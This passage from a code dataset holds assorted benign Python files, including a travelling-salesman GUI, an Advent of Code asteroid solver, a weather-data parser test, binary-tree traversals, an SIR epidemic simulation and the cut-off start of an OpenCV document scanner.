streams[i] is None or len(streams[i]) <= 1:\n streams[i] = sent\n # number of new tokens to fill in\n n_new = min(len(streams[i]) - 1, bptt - n_filled)\n # first n_retain tokens are retained from last batch\n data[n_retain + n_filled : n_retain + n_filled + n_new, i] = \\\n streams[i][:n_new]\n target[n_filled: n_filled + n_new, i] = streams[i][1: n_new + 1]\n streams[i] = streams[i][n_new:]\n n_filled += n_new\n\n data = data.to(device)\n target = target.to(device)\n model.eval()\n mems = tuple()\n with torch.no_grad():\n ret = model(data, target, *mems)\n loss = ret[0]\n loss = loss.sum()\n sent_rescore = ''\n sent_rescore = all_ids[idx] + ' ' + str(loss.item())\n outfile.write(sent_rescore + '\\n')\n\n\ncorpus = get_lm_corpus(args.data, args.dataset)\nmodel_dirs = args.models.split()\nfor model_dir in model_dirs:\n # Load the best saved model.\n model = None\n with open(os.path.join(args.work_dir, model_dir, 'model.pt'), 'rb') as f:\n model = torch.load(f)\n\n model.backward_compatible()\n model = model.to(device)\n\n if args.clamp_len > 0:\n model.clamp_len = args.clamp_len\n \n if args.same_length:\n model.same_length = True\n \n with open(os.path.join(args.out_dir, os.path.basename(args.nbest_file) + '-' + model_dir), 'w', encoding='utf-8') as outfile:\n rescore(corpus, args.nbest_file, model, args.ext_len, args.mem_len, outfile)\n\n","sub_path":"pytorch/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"230696448","text":"import getopt\nimport sys\nimport os\nfrom Problem import Problem\nfrom Town import Town\n\n\nfrom pygame.locals import KEYDOWN, QUIT, MOUSEBUTTONDOWN, K_RETURN, K_ESCAPE\nfont = None\nscreen = None\nfontTown = None\nfont_color = None\nproblem = None\ndef showSolution(problem):\n import pygame\n from Problem import Problem\n from Town import Town\n from Solution import Solution\n\n import sys\n\n screen_x = 500\n screen_y = 500\n\n font_color = [255,255,255] # white\n\n pygame.init()\n pygame.display.set_mode((screen_x, screen_y))\n pygame.display.set_caption('Exemple')\n\n screen = pygame.display.get_surface()\n font = pygame.font.Font(None,30)\n fontTown = pygame.font.Font(None,15)\n\n screen.fill(0)\n listPos = [town.pos for town in problem.best_solution]\n pygame.draw.lines(screen,Town.town_color,True,listPos)\n\n for town in problem.best_solution:\n town.draw(screen,fontTown,font_color)\n\n text = font.render(\"Distance : \"+\"{:.4f}\".format(problem.best_solution.distance), True, font_color)\n textRect = text.get_rect()\n screen.blit(text, textRect)\n pygame.display.flip()\n\n while True:\n event = pygame.event.wait()\n if event.type == KEYDOWN: break\n\ndef parse(file):\n problem = Problem([])\n with open(file, 'r+') as f:\n for l in f.readlines():\n town = l.split()\n x = int(town[1])\n y = int(town[2])\n type(x)\n problem.addTown(Town( x, y, town[0]))\n return problem\n\ndef getTowns():\n import pygame\n from Problem import Problem\n from Town import Town\n\n from pygame.locals import KEYDOWN, QUIT, MOUSEBUTTONDOWN, K_RETURN, K_ESCAPE\n import sys\n\n screen_x = 500\n screen_y = 500\n\n font_color = [255,255,255] # white\n list = []\n problem = Problem(list)\n\n pygame.init()\n pygame.display.set_mode((screen_x, screen_y))\n pygame.display.set_caption('Exemple')\n screen = pygame.display.get_surface()\n font = pygame.font.Font(None,30)\n\n problem.draw(screen, font, font_color)\n\n collecting = True\n size = 0\n townName = \"Town\"\n while collecting:\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit(0)\n elif event.type == KEYDOWN and event.key == K_RETURN:\n collecting = False\n elif event.type == MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n problem.addTown(Town(pos[0], pos[1], townName+str(size)))\n size += 1\n problem.draw(screen, font, font_color)\n return problem\n\ndef ga_solve(file=None, gui=True, maxtime=0):\n global problem\n if file is not None:\n problem = parse(file)\n else:\n if gui is True:\n problem = getTowns()\n else:\n print(\"No gui, and no file passed as argument\")\n exit()\n print (\"solving\")\n problem.solve(gui, maxtime)\n print (\"solved\")\n\n\ndef showDoc():\n print(__doc__)\n\ndef get_params():\n \"\"\"\n Get the arguments from the command line\n \"\"\"\n import argparse\n gui = True\n maxtime = 0\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\",\"--nogui\", help=\"disables gui\",action=\"store_true\")\n parser.add_argument(\"-m\",\"--maxtime\", help=\"sets a maximum time\")\n parser.add_argument(\"filename\", type=str, help=\"the name of the file containing a list of towns\", nargs=\"?\")\n\n args = parser.parse_args()\n if args.nogui is not None:\n gui = not args.nogui\n if args.maxtime is not None:\n maxtime = args.maxtime\n\n return gui, maxtime, args.filename\n\nif __name__ == \"__main__\":\n (GUI, MAX_TIME, FILENAME) = get_params()\n print(\"Parameters( gui: %s maxtime: %s filename: %s)\" % (GUI, MAX_TIME, FILENAME))\n ga_solve(FILENAME,GUI,MAX_TIME)\n\n if GUI is True :\n showSolution(problem)\n #ga_solve(\"./data/pb020.txt\",True,5)\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"557533974","text":"from helpers import *\nimport math\nimport pdb\nfrom colorama import init, Fore, Style\n\n\ndef factors(a):\n f = set(\n [1]\n ) # this is sort of incorrect, but it solves the 0 case and everyone has a 1 in their factors anyway\n\n for i in range(1, int(math.sqrt(abs(a))) + 1):\n if (abs(a) % i) == 0:\n f.add(i)\n f.add(abs(a) // i)\n if a < 0:\n for i in f.copy():\n f.add(-i)\n return f\n\n\ndef gcf(a, b):\n if a == 0 or b == 0:\n a, b = a + b, a + b\n fa = factors(a)\n fb = factors(b)\n return int(max(list(fa & fb)))\n\n\ndef printgrid(grid):\n x_max = max([k[0] for k in grid.keys()])\n y_max = max([k[1] for k in grid.keys()])\n\n for y in range(y_max + 1):\n for x in range(x_max + 1):\n if grid[(x, y)] == \"*\":\n print(Fore.RED + grid[(x, y)] + Fore.RESET, end=\"\")\n elif grid[(x, y)] == \"x\":\n print(Fore.LIGHTBLACK_EX + grid[(x, y)] + Fore.RESET, end=\"\")\n elif grid[(x, y)] == \".\":\n print(Fore.LIGHTBLACK_EX + grid[(x, y)] + Fore.RESET, end=\"\")\n else:\n print(grid[(x, y)], end=\"\")\n print()\n print(f'Number of Visible Asteroids: {list(grid.values()).count(\"#\")}\\n\\n')\n\n\ndef problem1(problem_input):\n grid = dict()\n\n for y, line in enumerate(problem_input):\n for x, val in enumerate(line):\n grid[(x, y)] = val\n\n print(f'Astroid Count: {list(grid.values()).count(\"#\")}')\n asteroid_locations = {k: 0 for k, v in grid.items() if v == \"#\"}\n\n for base_location in asteroid_locations.keys():\n working_grid = grid.copy()\n working_grid[\n base_location\n ] = \"*\" # <- base Location = *, Astroids we see = #, astroids we dont see = x\n # pdb.set_trace()\n for asteroid in asteroid_locations.keys():\n if working_grid[asteroid] in \"x*.\":\n continue\n else:\n # we have a '#'\n step = asteroid[0] - base_location[0], asteroid[1] - base_location[1]\n div = gcf(step[0], step[1])\n # print(f'Base to Asteroid: {step} Compiles to: {(step[0]//div, step[1]//div)}')\n step = step[0] // div, step[1] // div\n\n test = asteroid[0] + step[0], asteroid[1] + step[1]\n while test in working_grid:\n if working_grid[test] == \"#\":\n working_grid[test] = \"x\"\n test = test[0] + step[0], test[1] + step[1]\n asteroid_locations[base_location] = list(working_grid.values()).count(\"#\")\n if asteroid_locations[base_location] == 282:\n print(\"Base Location: \", base_location)\n\n # printgrid(working_grid)\n return max(list(asteroid_locations.values()))\n\n\ndef distance(a, b):\n dx = a[0] - b[0]\n dy = a[1] - b[1]\n return math.sqrt(dx ** 2 + dy ** 2)\n\n\ndef angle(src, dest):\n\n dx = dest[0] - src[0]\n dy = dest[1] - src[1]\n\n if dy == 0:\n if dx > 0:\n return math.pi / 2\n return math.pi * 3 / 2\n\n if dx == 0:\n if dy < 0:\n return 0\n return math.pi\n\n if dx > 0 and dy < 0:\n return math.atan(dx / -dy)\n if dx > 0 and dy > 0:\n return math.pi / 2 + math.atan(dy / dx)\n if dx < 0 and dy > 0:\n return math.pi + math.atan(-dx / dy)\n if dx < 0 and dy < 0:\n return math.pi * 3 / 2 + math.atan(-dy / -dx)\n return math.atan(dx / -dy)\n\n\ndef do_angle_test():\n src = 0, 0\n dsts = [\n (0, -5),\n (2.5, -5),\n (5, -5),\n (5, 0),\n (5, 2.5),\n (5, 5),\n (0, 5),\n (-2.5, 5),\n (-5, 5),\n (-5, 0),\n (-5, -2.5),\n (-5, -5),\n ]\n\n dsts = []\n for x in range(8):\n dsts += [(x, -7)]\n\n for y in range(-7, 8):\n dsts += [(7, y)]\n\n for x in range(7, -8, -1):\n dsts += [(x, 7)]\n\n for y in range(7, -8, -1):\n dsts += [(-7, y)]\n\n for x in range(-7, 0):\n dsts += [(x, -7)]\n\n for dst in dsts:\n print(f\"{src} to {dst} is angel: {angle(src,dst)}\")\n\n\ndef dict_print(my_dict, inset_value=0):\n retval = \"\"\n for k, v in my_dict.items():\n retval += \" \" * inset_value\n retval += f\"{str(k)}: {str(v)}\\n\"\n print(retval)\n\n\ndef problem2(problem_input):\n\n grid = dict()\n\n for y, line in enumerate(problem_input):\n for x, val in enumerate(line):\n grid[(x, y)] = val\n\n base_location = 22, 19\n\n asteroid_targetting = dict()\n\n grid[base_location] = \"*\"\n\n for asteroid in [k for k, v in grid.items() if v == \"#\"]:\n asteroid_targetting[asteroid] = dict()\n asteroid_targetting[asteroid][\"r\"] = angle(base_location, asteroid)\n asteroid_targetting[asteroid][\"d\"] = distance(base_location, asteroid)\n\n # dict_print(asteroid_targetting)\n\n target_order = dict()\n for k, v in asteroid_targetting.items():\n if v[\"r\"] not in target_order:\n target_order[v[\"r\"]] = [k]\n else:\n target_order[v[\"r\"]] += [k]\n target_order[v[\"r\"]].sort(key=lambda x: asteroid_targetting[x][\"d\"])\n\n dict_print(target_order)\n\n printgrid(grid)\n\n kill_order = []\n\n while True:\n radii_order = list(target_order.keys())\n radii_order.sort()\n for r in radii_order:\n kill_order += [target_order[r].pop(0)]\n if len(kill_order) >= 200:\n return kill_order[-1]\n\n target_order == {k: v for k, v in target_order.items() if len(v) > 0}\n\n return\n for base_location in asteroid_locations.keys():\n print(f\"Investigating Astroid Base at {base_location}\")\n working_grid = grid.copy()\n working_grid[\n base_location\n ] = \"*\" # <- base Location = *, Astroids we see = #, astroids we dont see = x\n # pdb.set_trace()\n for asteroid in asteroid_locations.keys():\n if working_grid[asteroid] in \"x*.\":\n continue\n else:\n # we have a '#'\n step = asteroid[0] - base_location[0], asteroid[1] - base_location[1]\n div = gcf(step[0], step[1])\n # print(f'Base to Asteroid: {step} Compiles to: {(step[0]//div, step[1]//div)}')\n step = step[0] // div, step[1] // div\n\n test = asteroid[0] + step[0], asteroid[1] + step[1]\n while test in working_grid:\n if working_grid[test] == \"#\":\n working_grid[test] = \"x\"\n test = test[0] + step[0], test[1] + step[1]\n asteroid_locations[base_location] = list(working_grid.values()).count(\"#\")\n\n printgrid(working_grid)\n return max(list(asteroid_locations.values()))\n","sub_path":"aoc2019/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"466264013","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@package cgsn_parsers.tests.test_parse_metbk\n@file cgsn_parsers/tests/test_parse_metbk.py\n@author Christopher Wingard\n@brief Unit tests for parsing the METBK data\n\"\"\"\nimport numpy as np\nimport unittest\n\nfrom nose.plugins.attrib import attr\nfrom os import path\n\nfrom cgsn_parsers.parsers.parse_metbk import Parser\n\n# test data file created using chunks of data from various files with the\n# different cases of data we might encounter.\nTESTDATA = path.join(path.dirname(__file__), 'metbk/metbk.test.dat')\n\n\n@attr('parse')\nclass TestParsingUnit(unittest.TestCase):\n '''\n OOI Endurance and Pioneer moorings use a custom built system from WHOI to\n log data from a suite of meterological instruments with the data output\n once a minute. The test data used below comes from a few different log\n files, combined together to capture the diffent cases where missing data\n is identified by either a NaN, Na or N.\n '''\n def setUp(self):\n '''\n Load and parse the test METBK data and set the expected output array.\n '''\n # initialize Parser objects for the metbk types defined above.\n self.metbk = Parser(TESTDATA)\n\n # set the expected output array minus the date/time strings\n self.expected = np.array([\n [1021.22, np.nan, np.nan, 298.2, 14.05, 9.444, 3.1416, 40.0, np.nan, np.nan],\n [1021.49, np.nan, np.nan, 299.8, 14.03, 9.439, 3.1409, 79.6, np.nan, np.nan],\n [1020.94, np.nan, np.nan, 301.1, 14.06, 9.422, 3.1384, 80.2, np.nan, np.nan],\n [1023.22, 62.072, 3.418, 244.3, 4.40, 8.965, 3.0188, 2.1, -5.38, 2.03],\n [1023.15, 62.969, 3.485, 244.3, 4.29, 8.955, 3.0175, 2.3, -5.47, 2.48],\n [1023.15, 60.724, 3.380, 245.6, 4.40, 8.955, 3.0161, 2.2, -5.71, 1.31],\n [1020.12, np.nan, np.nan, 343.5, 14.03, 9.115, 3.0978, np.nan, -3.23, 4.32],\n [1020.94, np.nan, np.nan, 341.6, 14.01, 9.131, 3.0997, np.nan, -5.14, 4.22],\n [1020.94, np.nan, np.nan, 338.6, 13.97, 9.132, 3.0997, np.nan, -4.57, 4.06]])\n\n def test_parse_metbk(self):\n '''\n Test parsing of the METBK data\n '''\n self.metbk.load_ascii()\n self.metbk.parse_data()\n parsed = self.metbk.data.toDict()\n\n np.testing.assert_array_equal(parsed['barometric_pressure'], self.expected[:, 0])\n np.testing.assert_array_equal(parsed['relative_humidity'], self.expected[:, 1])\n np.testing.assert_array_equal(parsed['air_temperature'], self.expected[:, 2])\n np.testing.assert_array_equal(parsed['longwave_irradiance'], self.expected[:, 3])\n np.testing.assert_array_equal(parsed['precipitation_level'], self.expected[:, 4])\n np.testing.assert_array_equal(parsed['sea_surface_temperature'], self.expected[:, 5])\n np.testing.assert_array_equal(parsed['sea_surface_conductivity'], self.expected[:, 6])\n np.testing.assert_array_equal(parsed['shortwave_irradiance'], self.expected[:, 7])\n np.testing.assert_array_equal(parsed['eastward_wind_velocity'], self.expected[:, 8])\n np.testing.assert_array_equal(parsed['northward_wind_velocity'], self.expected[:, 9])\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cgsn_parsers/tests/test_metbk.py","file_name":"test_metbk.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"534512361","text":"from typing import List\nfrom collections import deque\n\nclass Node(object):\n def __init__(self, data, left_child=None, right_child=None):\n self.data = data\n self.left_child = left_child\n self.right_child = right_child\n\n def __str__(self):\n return str(self.data)\n\n\n# class Tree(object):\n# def __init__(self, root):\n# self.root = root\n#\n#\n# def add(self, elem):\n# node = Node(elem)\n# if self.root == None:\n# self.root = node\n# else:\n# queue = []\n# queue.append(self.root)\n# while queue:\n# cur = queue.pop(0)\n# if cur.left_child == None:\n# cur.left_child = node\n# return\n# elif cur.right_child == None:\n# cur.right_child = node\n# return\n# else:\n# queue.append(cur.right_child)\n# queue.append(cur.left_child)\ndef create(array: List):\n node = Node(data=None)\n if array is None or len(array) == 0:\n return None\n data = array.pop(0)\n if data != -1:\n node.data = data\n node.left_child = create(array)\n node.right_child = create(array)\n return node\n\n\ndef pre_order_search(tree):\n if tree is None:\n return\n print(tree.data)\n pre_order_search(tree.left_child)\n pre_order_search(tree.right_child)\n\n\ndef pre_order_search_with_stack(tree):\n stack = []\n tree_node = Node(tree.data, tree.left_child, tree.right_child)\n while stack or tree_node:\n while tree_node:\n print(tree.data)\n stack.append(tree_node.left_child)\n tree_node = tree_node.left_child\n if stack:\n tree_node = stack.pop()\n tree_node = tree_node.right_child\n\n\ndef mid_order_search(tree):\n if tree is None:\n return\n mid_order_search(tree.left_child)\n print(tree.data)\n mid_order_search(tree.right_child)\n\n\ndef last_order_search(tree):\n if tree is None:\n return\n last_order_search(tree.left_child)\n last_order_search(tree.right_child)\n print(tree.data)\n\n\ndef level_order_search(tree):\n search_queue = deque()\n # 正确表达节点的信息,通过节点对象的指针去获取左右节点。单纯通过获得data 的方式无法遍历打印\n search_queue.append(Node(tree.data, tree.left_child, tree.right_child))\n while search_queue:\n node = search_queue.popleft()\n print(node)\n if node.left_child:\n search_queue.append(node.left_child)\n if node.right_child:\n search_queue.append(node.right_child)\n\n\nif __name__ == '__main__':\n # node1 = Node(\"A\", \"B\", \"C\")\n # node2 = Node(\"B\", None, \"D\")\n # node3 = Node(\"C\", \"E\", \"F\")\n # node4 = Node(\"E\", \"G\", None)\n # node5 = Node(\"F\", \"H\", \"I\")\n # 通过列表的方式创建数\n\n tree_list = [3, 2, 9, -1, -1, 10, -1, -1, 8, -1, 4]\n tree = create(tree_list)\n # pre_order_search(tree)\n # mid_order_search(tree)\n # last_order_search(tree)\n\n # pre_order_search_with_stack(tree)\n level_order_search(tree)\n # search_queue = deque()\n # search_queue += search_queue + Node\n # print(tree)\n\n # node1 = Node(15)\n # node2 = Node(7)\n # node3 = Node(20, node1, node2)\n # node4 = Node(9)\n # base = Node(3, node4, node3)\n","sub_path":"leetCode/binary_tree_search/DFS_binary_search.py","file_name":"DFS_binary_search.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"147391579","text":"# Title: MatchName\r\n# Version: 1.0\r\n# Author: Clayton Thompson\r\n# Date: Start: 8/1/2018 Complete: 8/1/2018 Last-Update: 8/3/2018\r\n# Python: Version 3.6\r\n# Purpose:\r\n\r\nimport csv\r\nimport re\r\n\r\n# From modified IRS data csv, extract records for SC only\r\n# Save to new csv file\r\nwith open(\"Outstanding.csv\", \"r\") as source:\r\n src = csv.reader(source)\r\n i = 1\r\n for s in src:\r\n i += 1\r\n with open(\"SCIRSdat.csv\", \"r\") as data:\r\n dat = csv.reader(data)\r\n for d in dat:\r\n if re.match(s[0].strip(), d[3], re.IGNORECASE):\r\n print(i)\r\n with open(\"Final1.csv\", \"a\", newline='') as result:\r\n wtr = csv.writer(result)\r\n wtr.writerow([s[0], s[1], s[2], s[3], s[4], s[5], s[6], s[7], s[8], s[9], s[10], s[11],\r\n s[12], s[13], s[14], s[15], s[16], s[17], d[8]])\r\n break\r\n","sub_path":"MatchName1.py","file_name":"MatchName1.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"649660260","text":"import argparse\nfrom matplotlib import cm\nfrom utils import get_logger\nimport pandas as pd\nfrom utils import read_file_contents_list\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\nlogger = get_logger('Plot')\n\n\ndef main():\n parser = argparse.ArgumentParser('Plot box and scatter data.')\n parser.add_argument('--in-csv', type=str)\n parser.add_argument('--thres-val', type=float)\n parser.add_argument('--out-fig', type=str)\n args = parser.parse_args()\n\n test_collection_df = pd.read_csv(args.in_csv)\n test_dict = test_collection_df.set_index('TestName').to_dict('index')\n\n num_test = len(test_dict)\n num_data = 50\n\n y_table = np.full((num_data, num_test), 1).astype(float)\n for test_idx, test_name in enumerate(test_dict):\n test_item = test_dict[test_name]\n test_df = pd.read_csv(test_item['CSV'])\n y_all = test_df[test_item['COLUMN']].to_numpy()\n y_table[:, test_idx] = y_all[:]\n\n fig, ax = plt.subplots(figsize=(num_test * 2 + 2, 8))\n plt.boxplot(y_table)\n\n # Add outliers as scatter points\n num_outlier = np.zeros(num_test)\n mean_val = np.zeros(num_test)\n # kp_val = np.zeros(num_test)\n outlier_data = []\n for test_idx, test_name in enumerate(test_dict):\n test_item = test_dict[test_name]\n test_df = pd.read_csv(test_item['CSV'])\n data_dict = test_df.set_index('Scan').to_dict('index')\n outlier_list = read_file_contents_list(test_item['OUTLIER'])\n num_outlier[test_idx] = len(outlier_list)\n scan_list = test_df['Scan'].to_list()\n column_flag = test_item['COLUMN']\n x_out_all, y_out_all = get_x_y_outlier_list(data_dict,\n column_flag,\n scan_list,\n test_idx + 1)\n # kp_val[test_idx] = data_dict[outlier_list[0]][column_flag]\n mean_val[test_idx] = np.mean(y_out_all)\n plt.scatter(x_out_all, y_out_all, color='r', alpha=0.5)\n\n x_out, y_out = get_x_y_outlier_list(data_dict,\n column_flag,\n outlier_list,\n test_idx + 1)\n outlier_data.append(y_out)\n\n # plot outlier as connected dots\n # for outlier_idx in range(int(num_outlier[0])):\n # y_val = [outlier_data[test_idx][outlier_idx] for test_idx in range(num_test)]\n # plt.plot(range(1, len(y_val) + 1), y_val, linestyle='--', marker='o', color='b')\n\n labels = [item.get_text() for item in ax.get_xticklabels()]\n for test_idx, test_name in enumerate(test_dict):\n mean = float(\"{:.5f}\".format(mean_val[test_idx]))\n # kp = float(\"{:.5f}\".format(kp_val[test_idx]))\n # labels[test_idx] = f'{test_name} \\noutlier {int(num_outlier[test_idx])}/{num_data}\\nmean {mean}'\n labels[test_idx] = f'{test_name} \\nmean {mean}'\n # labels[test_idx] = f'{test_name}\\n KP1 Lung DSC {kp}'\n ax.set_xticklabels(labels)\n\n # Threshold.\n print(f'Thres: {args.thres_val}')\n plt.axhline(y=args.thres_val, color='r', linestyle='--')\n\n logger.info(f'Save plot to {args.out_fig}')\n plt.grid()\n plt.savefig(args.out_fig)\n\n\ndef get_x_y_outlier_list(data_dict, column_flag, outlier_list, x_idx):\n y_outlier = [data_dict[file_name][column_flag] for file_name in outlier_list]\n x_outlier = np.random.normal(x_idx, 0.01, len(y_outlier))\n\n return x_outlier, y_outlier\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/get_combined_box_and_outlier_scatter_w_csv.py","file_name":"get_combined_box_and_outlier_scatter_w_csv.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"568188499","text":"#check whether given input is palindrome or not....\r\n\r\ndef pal(strn):\r\n strn2= strn[::-1]\r\n if strn==strn2:\r\n print(\"Input is palindrome...\")\r\n else:\r\n print(\"Not a palindrome\")\r\n \r\n\r\nstring = input(\"Enter the input: \")\r\nif len(string)!=0:\r\n pal(string)\r\nelse:\r\n print(\"Invalid input! Input string...\")\r\n","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"261647672","text":"\"\"\"\nExtract page properties information from an (gross, icky) SQL file.\n\nUsage:\n extract_page_properties (-h|--help)\n extract_page_properties []...\n [--processes=]\n [--debug]\n [--verbose]\n\n\nOptions:\n -h, --help Print this help message\n Path to SQL file to process. If no file is provided,\n read stdin.\n --processes= The number of parallel processes to run\n [default: ]\n --debug Print debug logging to stderr\n --verbose Print dots and stuff to stderr\n\"\"\"\nimport gzip\nimport json\nimport logging\nimport sys\nfrom multiprocessing import cpu_count\n\nimport docopt\nimport para\n\nfrom page_prop_dump import PagePropDump\n\nlogger = logging.getLogger(__name__)\n\n\ndef main(argv=None):\n args = docopt.docopt(__doc__)\n logging.basicConfig(\n level=logging.WARNING if not args['--debug'] else logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'\n )\n\n if len(args['']) == 0:\n logger.info(\"Reading from \")\n sql_files = [sys.stdin]\n else:\n sql_files = args['']\n\n if args['--processes'] == \"\":\n processes = cpu_count()\n else:\n processes = int(args['--processes'])\n\n verbose = args['--verbose']\n\n run(sql_files, processes, verbose)\n\n\ndef run(sql_files, processes, verbose):\n\n def extract_from_sql_file(path):\n if isinstance(path, str):\n logger.debug(\"Opening {0}\".format(path))\n f = gzip.open(path, 'rt', errors='replace')\n else:\n logger.debug(\"Reading from {0}\".format(path))\n f = path\n dump = PagePropDump.from_sql_file(f)\n for sitelink_usage in dump.usages:\n yield sitelink_usage\n\n usages = para.map(extract_from_sql_file, sql_files, mappers=processes)\n for i, sitelink_usage in enumerate(usages):\n json.dump(sitelink_usage.to_json(), sys.stdout)\n sys.stdout.write(\"\\n\")\n\n if verbose and i % 1000 == 0:\n sys.stderr.write(\".\")\n sys.stderr.flush()\n\nmain()\n\n\n","sub_path":"python_analysis_scripts/entity_usage_on_corresponding_articles/extract_page_properties.py","file_name":"extract_page_properties.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"639495800","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 15 11:44:07 2020\n\n@author: gongmeiting\n\"\"\"\n\n#A simply SIR model\n#import necessary libraries\n#define the basic variables of the model\n#creat arrays for each variables to track how they evolve over time \n#record the output of each time step\n#plot the result\n#save plots as a file\n\n\n#import necessary libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n#the total population is 10000\n#define the basic variables of the model\nI=1\n#I represents infected people\nS=9999\n#S represents susceptible individuals \nR=0\n#R represents recovered people\nN=S+I+R\n#N represents total people\nbeta=0.3\n#beta is infection probability\ngamma=0.05\n#gamma is recovery probability\n#creat arrays for each variables to track how they evolve over time \ni=[I]\ns=[S]\nr=[R]\n#loop over 1000 time points\ntime=1000\nfor e in range(1,time+1):\n real_beta=beta*I/N\n # For a susceptible individual to be infected,\n # we consider not only the infection rate upon contact (beta), \n # but also the probability of making contact with an infected individual.\n si=list(np.random.choice(range(2),S,p=[1-real_beta,real_beta])).count(1)\n #si represents the people who are new infected \n #we choose numbers from range(2) (i.e. 0 or 1) S times,\n #with a probability of 1-real_beta of choosing 0 \n #and a probability of real_beta of choosing 1\n S=S-si\n I=I+si\n ir=list(np.random.choice(range(2),I,p=[1-gamma,gamma])).count(1)\n #ir represents the people who ae new recovered\n #we choose numbers from range(2) (i.e. 0 or 1) I times,\n #with a probability of 1-gamma of choosing 0 \n #and a probability of gamma of choosing 1\n I=I-ir\n R=R+ir\n #add elements to arrays\n s.append(S)\n i.append(I)\n r.append(R)\n#set up the dimensions and resolution of plot\nplt.figure(figsize=(6,4),dpi =150)\n#set up xlabel, ylabel, title etc\nplt.xlabel('time')\nplt.ylabel('population')\nplt.title('SIR model')\nplt.plot(list(range(time+1)), s, 'b',label='Susceptible')\nplt.plot(list(range(time+1)), i, 'r',label='Infected')\nplt.plot(list(range(time+1)), r, 'g',label='Recovered')\nlegend = plt.legend(loc='upper right')\nplt.savefig(\"SIR\",type='png')\nplt.show()\n#by trial, I find that running the code several times produces different results","sub_path":"Practical 12 Modelling infections/SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"505905984","text":"\"\"\"Document Scanner\"\"\"\nimport cv2 as cv\nimport numpy as np\nimport os\n\n#cap = cv.VideoCapture(0) #0 is id of camera in your laptop\n# the id's of height, width, brightness is here https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html#gaeb8dd9c89c10a5c63c139bf7c4f5704d\n#imageWidth = 480\n#imageHeight = 640\n\n# cap.set(3,imageWidth)\n# cap.set(4,imageWidth)\n# cap.set(10,150)\nfile_path = os.path.dirname(__file__)\nimg = cv.imread(file_path + '/document.jpg')\nimageHeight, imageWidth = img.shape[:2]\n\n\ndef stackImages(scale,imgArray):\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n width = imgArray[0][0].shape[1]\n height = imgArray[0][0].shape[0]\n if rowsAvailable:\n for x in range ( 0, rows):\n for y in range(0, cols):\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:\n imgArray[x][y] = cv.resize(imgArray[x][y], (0, 0), None, scale, scale)\n else:\n imgArray[x][y] = cv.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv.cvtColor( imgArray[x][y], cv.COLOR_GRAY2BGR)\n imageBlank = np.zeros((height, width, 3), np.uint8)\n hor = [imageBlank]*rows\n hor_con = [imageBlank]*rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n ver = np.vstack(hor)\n else:\n for x in range(0, rows):\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\n imgArray[x] = cv.resize(imgArray[x], (0, 0), None, scale, scale)\n else:\n imgArray[x] = cv.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv.cvtColor(imgArray[x], cv.COLOR_GRAY2BGR)\n hor= np.hstack(imgArray)\n ver = hor\n return ver\n\n\n\n\n\n\ndef getContours(img):\n biggest = np.array([])\n maxArea = 0\n #external - outer details in RETR EXTERNAL\n #aprox chain - give us all elemtns non compress in one detail\n\n contours, hierarchy = cv.findContours(img,cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n #cv.drawContours(imgContour, cnt, -1, (252, 132, 3), 3)\n area = cv.contourArea(cnt)\n #contourldx draw all the contour\n if area >5000:\n perimeter = cv.arcLength(cnt,True) #true bcs its closed\n\n #aprox corner points\n approx = cv.approxPolyDP(cnt, 0.02*perimeter, True)\n if area > maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n cv.drawContours(imgContour, biggest, -1, (252, 132, 3), 3)\n\n return biggest\n\n\ndef sorter(myPoints):\n myPoints = myPoints.reshape((4,2))\n myPointsNew = np.zeros((4,1,2),np.int32)\n add = myPoints.sum(1)\n #print('add',add)\n\n myPointsNew[0] = myPoints[np.argmin(add)]\n myPointsNew[3] = myPoints[np.argmax(add)]\n diff = 